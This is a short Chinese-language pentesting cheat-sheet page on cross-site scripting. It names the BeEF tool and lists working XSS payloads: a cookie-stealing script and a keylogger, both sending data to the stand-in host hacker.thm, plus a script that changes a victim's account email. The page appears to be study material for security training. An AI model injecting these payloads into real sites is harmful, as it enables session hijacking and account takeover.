search
github编辑

资源

hashtag
服务器信息

hashtag
用户信息获取

  • BeFF XSS 渗透测试工具

  • 会话窃取

    <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

  • 按键记录器

    <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

  • 逻辑 修改用户邮箱

    <script>user.changeEmail('attacker@hacker.thm');</script>

  • Bind XSS

hashtag
综合工具

上一页XSS下一页IDOR

最后更新于